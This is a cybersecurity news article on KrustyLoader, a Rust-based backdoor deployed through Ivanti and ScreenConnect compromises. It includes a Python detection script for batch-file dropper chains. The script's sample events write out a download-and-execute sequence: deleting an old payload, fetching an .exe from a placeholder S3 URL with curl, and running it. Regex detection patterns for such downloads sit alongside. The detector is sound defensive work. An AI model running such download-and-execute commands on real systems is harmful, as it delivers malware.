Rust’s memory-safety guarantees, which rule out whole classes of bugs such as buffer overflows, make it an attractive language for threat actors building backdoors.
Its native-code performance is a further draw: malware written in Rust can be both efficient and stealthy.
Quick development of attack tooling is also well supported by the language’s ecosystem and community.
Cybersecurity researchers at PolySwarm recently analysed a new Rust-based backdoor, KrustyLoader, that is actively being used against Windows and Linux systems.
Technical analysis
KrustyLoader is cross-platform: recent industry reports have described variants targeting both Linux and Windows systems.
The Linux version of KrustyLoader, which appeared on compromised Ivanti devices between late 2023 and early 2024, has been attributed to the China-linked hacking group tracked as “UNC5221.”
UNC5221 (aka UTA0178) focuses on targeted espionage rather than opportunistic attacks.
Information about the group is still limited, but it is known to employ malware such as:-
CHAINLINE
FRAMESTING
WIREFIRE
LIGHTWIRE
BUSHWALK
WARPWIRE
ZIPLINE
There is also evidence that attackers exploited ScreenConnect and used that access to deploy a Windows variant of KrustyLoader.
In the Ivanti intrusions, the attackers exploited CVE-2024-21887 and CVE-2023-46805 to compromise Ivanti Connect Secure and Policy Secure gateways.
Rust payloads deployed KrustyLoader, which in turn fetched the post-exploitation framework Sliver.
Although patches for both CVEs are available, unpatched systems remain vulnerable.
Cybersecurity analysts at WithSecure observed threat actors hijacking ScreenConnect and deploying the Windows form of KrustyLoader.
Like its Linux cousin, this Rust-based loader downloads and launches a secondary payload, typically Sliver.
In two directories on the compromised system, the threat actors plant a batch file named r.bat. This script deletes the previous payloads, downloads KrustyLoader from a randomized URL hosted on AWS S3, saves it as 1.exe and executes it.
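The r.bat chain above (delete old payload, fetch an executable from an S3 URL, run it) is easier to detect on behaviour than on the file name, which an attacker can change at will. The script below is an added example, not code from the article, PolySwarm or WithSecure: it correlates constructed Sysmon-style process-creation events by parent PID and flags any batch-file launcher whose children both download an .exe from an AWS S3 hostname and then execute that same file. Hostnames, paths, PIDs, the bucket name and the object key are invented for illustration.

```python
"""Detect a batch-file dropper chain: a .bat launcher whose child processes
delete an old payload, download an .exe from an S3 URL and then run it.
Added example with constructed events; not the article's or any vendor's code."""
import re
from dataclasses import dataclass

# Constructed process-creation events (Sysmon Event ID 1 shape). All values
# are invented; ws01 carries the malicious chain, ws02 a benign S3 download.
SAMPLE_EVENTS = [
    {"host": "ws01", "pid": 410, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\Public\r.bat"'},
    {"host": "ws01", "pid": 411, "ppid": 410, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c del /f /q C:\Users\Public\1.exe"},
    {"host": "ws01", "pid": 412, "ppid": 410, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\Public\1.exe https://examplebucket.s3.amazonaws.com/a1b2c3d4"},
    {"host": "ws01", "pid": 413, "ppid": 410, "image": r"C:\Users\Public\1.exe",
     "cmdline": r"C:\Users\Public\1.exe"},
    # Benign: an admin script fetches a tool from S3 but never executes it.
    {"host": "ws02", "pid": 520, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Tools\deploy.bat"'},
    {"host": "ws02", "pid": 521, "ppid": 520, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Tools\agent.exe https://examplebucket.s3.amazonaws.com/agent"},
]

BAT_LAUNCH = re.compile(r"\.bat\b", re.I)                      # launcher runs a batch file
DELETE_CMD = re.compile(r"\b(del|erase)\b", re.I)               # cleanup of the old payload
S3_URL = re.compile(r"https?://\S*s3[.-][a-z0-9.-]*amazonaws\.com\S*", re.I)
EXE_PATH = re.compile(r"[a-z]:\\[^\s\"']*?\.exe\b", re.I)       # first drive-letter .exe path


@dataclass
class Finding:
    host: str
    launcher: str       # command line of the .bat launcher
    dropped_path: str   # executable written by the download stage
    stages: tuple       # which of delete / download / execute were seen


def detect_batch_dropper_chain(events):
    """Return one Finding per .bat launcher whose children download an .exe
    from S3 and then execute that same file. The delete stage is recorded
    when present but is not required, so a first-run infection still fires."""
    findings = []
    for launcher in (e for e in events if BAT_LAUNCH.search(e["cmdline"])):
        children = [e for e in events
                    if e["host"] == launcher["host"] and e["ppid"] == launcher["pid"]]
        stages, dropped = set(), None
        for child in children:
            if DELETE_CMD.search(child["cmdline"]):
                stages.add("delete")
            if S3_URL.search(child["cmdline"]):
                path = EXE_PATH.search(child["cmdline"])
                if path:
                    stages.add("download")
                    dropped = path.group(0)
        # Execution is only counted for the file the download stage wrote.
        if dropped and any(c["image"].lower() == dropped.lower() for c in children):
            stages.add("execute")
        if {"download", "execute"} <= stages:
            findings.append(Finding(launcher["host"], launcher["cmdline"],
                                    dropped, tuple(sorted(stages))))
    return findings


if __name__ == "__main__":
    for f in detect_batch_dropper_chain(SAMPLE_EVENTS):
        print(f"{f.host}: {f.launcher} -> {f.dropped_path} stages={f.stages}")
```

Run against the constructed events, only ws01 is reported, with all three stages; ws02 is skipped because the downloaded file is never executed by a child of the batch launcher. In a real deployment the S3 pattern would be one entry in a list of download sources, and the download stage would also need to cover certutil, bitsadmin and PowerShell's Invoke-WebRequest, since the loader is not tied to curl.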
IOCs
The post New Rust-based Backdoor Attacking Windows and Linux Systems appeared first on Cyber Security News.